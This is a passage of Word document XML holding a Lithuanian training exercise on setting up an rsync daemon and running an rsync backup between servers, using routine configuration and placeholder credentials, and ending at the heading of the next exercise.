        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>path = /home/user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3760E8BD" w14:textId="4E0D4C19" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>list = yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085AFF73" w14:textId="0531018E" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>auth users = rsync-user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BF5752" w14:textId="02656201" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>secrets file = /etc/secret.passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCAA0B9" w14:textId="777334C8" w:rsidR="0B77EE6E" w:rsidRPr="005A5C28" w:rsidRDefault="0B77EE6E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="438804F4" w14:textId="349978A2" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Sukurkite failą su kredencialais, kad galėtumėte naudoti</w:t>
      </w:r>
      <w:r w:rsidR="00D33249" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> š</w:t>
      </w:r>
      <w:r w:rsidR="00D33249" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iuo</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kompiuter</w:t>
      </w:r>
      <w:r w:rsidR="00D33249" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iu</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41984E15" w14:textId="47476429" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nano /etc/secret.passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418683D1" w14:textId="5D0CCB02" w:rsidR="10C2F772" w:rsidRPr="005A5C28" w:rsidRDefault="10C2F772" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74B8B99D" w14:textId="3E7D5C74" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Įveskite vartotojo vardą ir slaptažodį.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DB8E2C" w14:textId="268CED67" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>rsync-user:rsync-pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BAEC50" w14:textId="2C6A7A32" w:rsidR="10C2F772" w:rsidRPr="005A5C28" w:rsidRDefault="10C2F772" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CD69A9B" w14:textId="418781B9" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pakeiskite failo teises į tik skaitomą root vartotojo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBA8246" w14:textId="15666CFA" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>chmod 0600 /etc/secret.passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6AEBB5" w14:textId="0B28710C" w:rsidR="10C2F772" w:rsidRPr="005A5C28" w:rsidRDefault="10C2F772" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A416843" w14:textId="1F43D8D2" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Iš naujo paleiskite „Rsync“ daemon tarnybą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E82077" w14:textId="3DF0B1CC" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>systemctl restart rsyncd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F361BEB" w14:textId="65FBC48B" w:rsidR="0B77EE6E" w:rsidRPr="005A5C28" w:rsidRDefault="0B77EE6E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A2BA6CE" w14:textId="718B890B" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="00330F1D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ukur</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>vartotoją, kuris buvo nurodytas konfigūracijoje ir faile su kredencialais.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0E0FB3" w14:textId="28A2A230" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>useradd rsync-user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFE0BF5" w14:textId="697DBF93" w:rsidR="10C2F772" w:rsidRPr="005A5C28" w:rsidRDefault="10C2F772" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799C568D" w14:textId="10DF31D4" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Gaunančio „Rsync“ atsarginės kopijos serverio konfigūravimas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A471EC3" w14:textId="6C1DA253" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Sukurkite failą slaptažodžiui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15204E5B" w14:textId="1CFFC94E" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nano /etc/secret.passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470DAAD3" w14:textId="70BB274B" w:rsidR="0B77EE6E" w:rsidRPr="005A5C28" w:rsidRDefault="0B77EE6E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16523154" w14:textId="6E808252" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Įveskite „Rsync“ vartotojo slaptažodį</w:t>
      </w:r>
      <w:r w:rsidR="24F59516" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>serveryje.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3741A5D9" w14:textId="76378E1F" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>rsync-pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148A7675" w14:textId="7ED85826" w:rsidR="0B77EE6E" w:rsidRPr="005A5C28" w:rsidRDefault="0B77EE6E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A59A38B" w14:textId="2FBE5DA6" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="00330F1D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">akeiskite </w:t>
      </w:r>
      <w:r w:rsidR="78675EAA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>vartotojo</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="02D9D534" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>te</w:t>
      </w:r>
      <w:r w:rsidR="6B6DDEF4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="02D9D534" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="5B460346" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3EAC8C" w14:textId="0203AFF2" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>chmod 0600 /etc/secret.passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19791986" w14:textId="7AC82605" w:rsidR="10C2F772" w:rsidRPr="005A5C28" w:rsidRDefault="10C2F772" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="058D480D" w14:textId="22696725" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="7A687B6C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Kuriama </w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>atsarginė kopija</w:t>
      </w:r>
      <w:r w:rsidR="7F90B54F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C35C55" w14:textId="49462A60" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Sukurkite aplanką atsarginei kopijai</w:t>
      </w:r>
      <w:r w:rsidR="5C5C7380" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1471D6CE" w14:textId="19217513" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>mkdir /opt/backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56234ACE" w14:textId="434BEC2E" w:rsidR="10C2F772" w:rsidRPr="005A5C28" w:rsidRDefault="10C2F772" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0726D8A5" w14:textId="75A2C6A7" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ši komanda pradės</w:t>
      </w:r>
      <w:r w:rsidR="7D9E4F60" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kurti</w:t>
      </w:r>
      <w:r w:rsidR="0024358D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>atsarginę kopiją. Pakeiskite source-server-ip šaltinio serverio IP adres</w:t>
      </w:r>
      <w:r w:rsidR="5AFA59F3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506F8E11" w14:textId="1A70AD32" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>rsync -a --password-file=/etc/secret.passwd rsync-user@source-server-ip::data /opt/backup/$(date +%Y-%m-%d)/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6111948C" w14:textId="60455C1A" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="4062475D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Norėdami nustatyti periodines atsargines kopijas, galite </w:t>
      </w:r>
      <w:r w:rsidR="683211B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>vykdyti</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> „cron“</w:t>
      </w:r>
      <w:r w:rsidR="0024358D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>komand</w:t>
      </w:r>
      <w:r w:rsidR="037E3EB2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70421D9E" w14:textId="6901756C" w:rsidR="001732FC" w:rsidRPr="005A5C28" w:rsidRDefault="001732FC" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60D94CF9" w14:textId="77777777" w:rsidR="002A5374" w:rsidRPr="005A5C28" w:rsidRDefault="002A5374"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lastRenderedPageBreak/>
        <w:t>11 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">PASINAUDOJANT PROGRAMINE ĮRANGA, SKIRTA DUOMENŲ KOPIJŲ KŪRIMUI, SUKURTI DUOMENŲ ATSARGINĘ KOPIJĄ. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4342A0A7" w14:textId="2A619E0A" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">LAUKIAMI </w:t>
      </w:r>
      <w:r w:rsidR="00330F1D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>REZULTATAI</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
